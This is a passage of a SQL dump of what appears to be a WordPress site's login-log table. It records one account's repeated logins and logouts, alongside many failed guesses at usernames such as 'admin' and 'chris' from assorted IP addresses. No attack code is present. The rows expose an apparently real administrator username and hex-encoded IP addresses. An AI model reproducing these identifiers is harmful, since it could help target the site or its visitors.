(KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36'),(19506,128697,1698263055.540471,0,'loginOK','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0'),(19505,128696,1698262743.893184,0,'logout','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0'),(19504,128673,1698254706.760679,0,'loginOK','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0'),(19532,129519,1698450553.610742,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFFACE99088,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(19531,129516,1698448749.058563,0,'logout','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36'),(19530,129515,1698448632.672996,0,'loginOK','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36'),(19529,129514,1698448605.174448,0,'logout','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0'),(19522,129444,1698422966.019132,0,'logout','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0'),(19521,129432,1698418956.187498,0,'loginOK','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0'),(19519,129385,1698404501.681902,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF14A80915,'Mozilla/5.0'),(19520,129404,1698410031.006046,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF14A80890,'Mozilla/5.0'),(19518,129325,1698386784.843090,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF2DF9AB1F,'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36'),(19516,129185,1698341852.081870,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF675AA34B,'Mozilla/5.0'),(19517,129216,1698359961.863813,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF14A61D1C,'Mozilla/5.0'),(19528,129513,1698448541.770074,0,'loginOK','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0'),(19527,129506,1698443999.159834,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF9FDF2DD4,'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36'),(19526,129487,1698431987.765145,0,'logout','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0'),(19525,129460,1698426221.916740,0,'loginOK','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0'),(19524,129459,1698426189.391432,0,'logout','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36'),(19523,129458,1698426105.318204,0,'loginOK','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36'),(19578,131135,1699096822.294518,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF2D3DB892,'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko'),(19577,131127,1699095748.158926,1,'loginFailInvalidUsername','administrator',0,0x00000000000000000000FFFFCDB97AB8,'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/34.0.1847.116 Chrome/34.0.1847.116 Safari/537.36'),(19576,131119,1699086323.268612,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF6E36B14B,'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36'),(19568,131051,1699027171.958579,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF2D93F810,'Mozilla/5.0'),(19551,130075,1698655490.412735,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF51A1E5DF,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(19550,130074,1698655488.482357,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF51A1E5DF,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(19549,130073,1698655484.373534,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF51A1E5DF,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(19548,130069,1698635598.961758,0,'logout','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0'),(19547,130068,1698633748.125283,0,'loginOK','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0'),(19542,129861,1698595043.521580,0,'logout','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0'),(19541,129850,1698590567.518644,0,'loginOK','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0'),(19540,129790,1698550573.619154,0,'logout','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0'),(19539,129789,1698549313.145570,0,'loginOK','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0'),(19546,129872,1698601232.902517,0,'logout','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0'),(19545,129867,1698601039.277142,0,'loginOK','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0'),(19544,129866,1698600911.923187,0,'logout','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0'),(19543,129865,1698600727.096174,0,'loginOK','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0'),(19566,130808,1698986908.664585,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF2D93F810,'Mozilla/5.0'),(19567,130858,1698995271.267817,1,'loginFailInvalidUsername','wordpress_administrator',0,0x00000000000000000000FFFF6BBD0B51,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36'),(19565,130794,1698983356.030333,0,'logout','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0'),(19564,130787,1698979455.459259,0,'loginOK','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0'),(19555,130208,1698699859.761852,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34E80608,'Mozilla/5.0'),(19563,130774,1698966750.173604,0,'logout','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36'),(19554,130180,1698696997.779466,0,'logout','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0'),(19552,130112,1698685455.330575,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34E80608,'Mozilla/5.0'),(19553,130116,1698686394.587748,0,'loginOK','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0'),(19560,130746,1698939218.738736,0,'loginOK','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0'),(19557,130520,1698837516.126485,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFFD18D3E31,'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0'),(19556,130501,1698834602.530712,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF2D3DBC69,'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10'),(19559,130739,1698913393.014025,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFFC5302498,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:63.0) Gecko/20100101 Firefox/63.0'),(19558,130662,1698859965.183348,0,'loginOK','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0'),(19562,130755,1698956127.164886,0,'loginOK','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36'),(19561,130749,1698945622.575619,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF14A31C42,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36'),(19575,131112,1699077376.780525,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFFAA00DE0E,'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15'),(19574,131107,1699062160.443461,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF6BBD0453,'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0'),(19573,131106,1699061229.641876,1,'loginFailInvalidUsername','administrator',0,0x00000000000000000000FFFFCDB97ED6,'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0'),(19572,131057,1699034766.435069,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF0D5FE80B,'Mozilla/5.0'),(19571,131056,1699031973.532722,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF0D5FE80B,'Mozilla/5.0'),(19570,131055,1699031545.182497,0,'logout','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36'),(19569,131054,1699030696.663675,0,'loginOK','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36'),(19652,131223,1699130904.710391,1,'loginFailInvalidUsername','chris',0,0x00000000000000000000FFFFB92FAE56,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(19651,131222,1699130004.395617,1,'loginFailInvalidUsername','chris',0,0x00000000000000000000FFFFB92FAE56,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(19650,131221,1699130003.992756,1,'loginFailInvalidUsername','chris',0,0x00000000000000000000FFFFB92FAE56,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(19649,131220,1699130003.589668,1,'loginFailInvalidUsername','chris',0,0x00000000000000000000FFFFB92FAE56,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(19648,131219,1699130003.185579,1,'loginFailInvalidUsername','chris',0,0x00000000000000000000FFFFB92FAE56,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(19647,131218,1699130002.781783,1,'loginFailInvalidUsername','chris',0,0x00000000000000000000FFFFB92FAE56,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(19646,131217,1699130002.380345,1,'loginFailInvalidUsername','chris',0,0x00000000000000000000FFFFB92FAE56,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(19645,131216,1699130001.977295,1,'loginFailInvalidUsername','chris',0,0x00000000000000000000FFFFB92FAE56,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(19644,131215,1699130001.574371,1,'loginFailInvalidUsername','chris',0,0x00000000000000000000FFFFB92FAE56,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(19643,131214,1699130001.169059,1,'loginFailInvalidUsername','chris',0,0x00000000000000000000FFFFB92FAE56,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(19642,131213,1699130000.763609,1,'loginFailInvalidUsername','chris',0,0x00000000000000000000FFFFB92FAE56,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(19641,131212,1699129999.471352,1,'loginFailInvalidUsername','chris',0,0x00000000000000000000FFFFB92FAE56,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(19640,131211,1699129998.567834,1,'loginFailInvalidUsername','chris',0,0x00000000000000000000FFFFB92FAE56,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(19639,131210,1699129997.690736,1,'loginFailInvalidUsername','chris',0,0x00000000000000000000FFFFB92FAE56,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(19637,131208,1699129615.849380,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34E80608,'Mozilla/5.0'),(19638,131209,1699129618.962315,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34B204F0,'Mozilla/5.0'),(19636,131207,1699128849.115926,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34E80608,'Mozilla/5.0'),(19634,131206,1699128069.200800,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34E80608,'Mozilla/5.0'),(19635,131207,1699128849.113307,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34E80608,'Mozilla/5.0'),(19633,131205,1699127363.091467,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34B204F0,'Mozilla/5.0'),(19631,131203,1699126518.693142,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34E80608,'Mozilla/5.0'),(19632,131204,1699127295.093439,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34E80608,'Mozilla/5.0'),(19630,131203,1699126518.690596,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34E80608,'Mozilla/5.0'),(19628,131201,1699124979.755034,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34E80608,'Mozilla/5.0'),(19629,131202,1699125746.770025,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34E80608,'Mozilla/5.0'),(19627,131201,1699124979.752465,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34E80608,'Mozilla/5.0'),(19626,131200,1699124201.922067,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34E80608,'Mozilla/5.0'),(19624,131198,1699122644.302194,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34E80608,'Mozilla/5.0'),(19625,131199,1699123419.915663,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34E80608,'Mozilla/5.0'),(19623,131197,1699121880.797110,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34E80608,'Mozilla/5.0'),(19622,131196,1699121509.554401,0,'logout','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36'),(19621,131195,1699121114.572740,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34E80608,'Mozilla/5.0'),(19620,131193,1699120347.378816,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34E80608,'Mozilla/5.0'),(19619,131192,1699119584.170498,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34E80608,'Mozilla/5.0'),(19618,131191,1699119014.419100,0,'loginOK','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36'),(19617,131190,1699118874.013369,0,'logout','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36'),(19616,131189,1699118807.236025,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34E80608,'Mozilla/5.0'),(19614,131187,1699117258.788623,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34E80608,'Mozilla/5.0'),(19615,131188,1699118033.176176,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34E80608,'Mozilla/5.0'),(19613,131186,1699116483.375104,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34E80608,'Mozilla/5.0'),(19611,131184,1699114948.900585,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34E80608,'Mozilla/5.0'),(19612,131185,1699115710.323962,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34E80608,'Mozilla/5.0'),(19887,131733,1699360519.736794,1,'loginFailInvalidUsername','jmcadres',0,0x00000000000000000000FFFF14E1DF4C,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(19886,131732,1699360519.444202,1,'loginFailInvalidUsername','jmcadres',0,0x00000000000000000000FFFF14E1DF4C,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(19885,131732,1699360519.441691,1,'loginFailInvalidUsername','jmcadres',0,0x00000000000000000000FFFF14E1DF4C,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(19884,131731,1699360519.147886,1,'loginFailInvalidUsername','jmcadres',0,0x00000000000000000000FFFF14E1DF4C,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(19883,131731,1699360519.145368,1,'loginFailInvalidUsername','jmcadres',0,0x00000000000000000000FFFF14E1DF4C,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(19882,131730,1699360518.854435,1,'loginFailInvalidUsername','jmcadres',0,0x00000000000000000000FFFF14E1DF4C,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(19881,131729,1699360518.562223,1,'loginFailInvalidUsername','jmcadres',0,0x00000000000000000000FFFF14E1DF4C,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(19880,131728,1699360518.264322,1,'loginFailInvalidUsername','jmcadres',0,0x00000000000000000000FFFF14E1DF4C,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(19879,131727,1699360517.916670,1,'loginFailInvalidUsername','jmcadres',0,0x00000000000000000000FFFF14E1DF4C,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(19878,131726,1699360517.562773,1,'loginFailInvalidUsername','jmcadres',0,0x00000000000000000000FFFF14E1DF4C,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(19877,131725,1699360517.238370,1,'loginFailInvalidUsername','jmcadres',0,0x00000000000000000000FFFF14E1DF4C,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(19876,131724,1699360516.944494,1,'loginFailInvalidUsername','jmcadres',0,0x00000000000000000000FFFF14E1DF4C,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(19875,131723,1699360516.499686,1,'loginFailInvalidUsername','jmcadres',0,0x00000000000000000000FFFF14E1DF4C,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(19874,131722,1699360515.233388,1,'loginFailInvalidUsername','jmcadres',0,0x00000000000000000000FFFF14E1DF4C,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(19873,131721,1699360514.337579,1,'loginFailInvalidUsername','jmcadres',0,0x00000000000000000000FFFF14E1DF4C,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(19872,131720,1699359711.589363,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFFA2D6C521,'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36'),(19871,131719,1699359553.199974,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF6FE6CA93,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.167 Safari/537.36'),(19870,131718,1699357584.439281,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF2D775234,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36'),(19869,131717,1699357426.467966,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF679ECEA7,'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36'),(19868,131716,1699355449.233058,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF36544281,'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36'),(19867,131715,1699355292.635737,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFFADECB083,'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36'),(19866,131710,1699353280.759209,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF36F1496E,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36 MVisionPlayer/1.0.0.0'),(19865,131710,1699353280.756756,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF36F1496E,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36 MVisionPlayer/1.0.0.0'),(19864,131709,1699353125.665075,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF31E891CD,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(19863,131709,1699353125.662534,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF31E891CD,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(19861,131705,1699351749.361161,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34E8062F,'Mozilla/5.0'),(19862,131708,1699352407.049098,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34E8062F,'Mozilla/5.0'),(19860,131704,1699351112.564726,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF8C52356C,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36'),(19859,131703,1699351083.191330,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34E8062F,'Mozilla/5.0'),(19858,131702,1699350954.707235,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF23F56010,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(19857,131701,1699350423.026189,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34E8062F,'Mozilla/5.0'),(19855,131699,1699349102.125722,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34E8062F,'Mozilla/5.0'),(19856,131700,1699349762.692456,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34E8062F,'Mozilla/5.0'),(19854,131698,1699348996.063168,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFFADECB083,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36'),(19853,131697,1699348840.952734,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF529D100B,'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36'),(19852,131696,1699348440.961582,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34E8062F,'Mozilla/5.0'),(19850,131695,1699347773.902389,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34E8062F,'Mozilla/5.0'),(19851,131696,1699348440.958758,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34E8062F,'Mozilla/5.0'),(19849,131694,1699347114.826923,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34E8062F,'Mozilla/5.0'),(19848,131693,1699346878.623216,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF334DE61D,'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 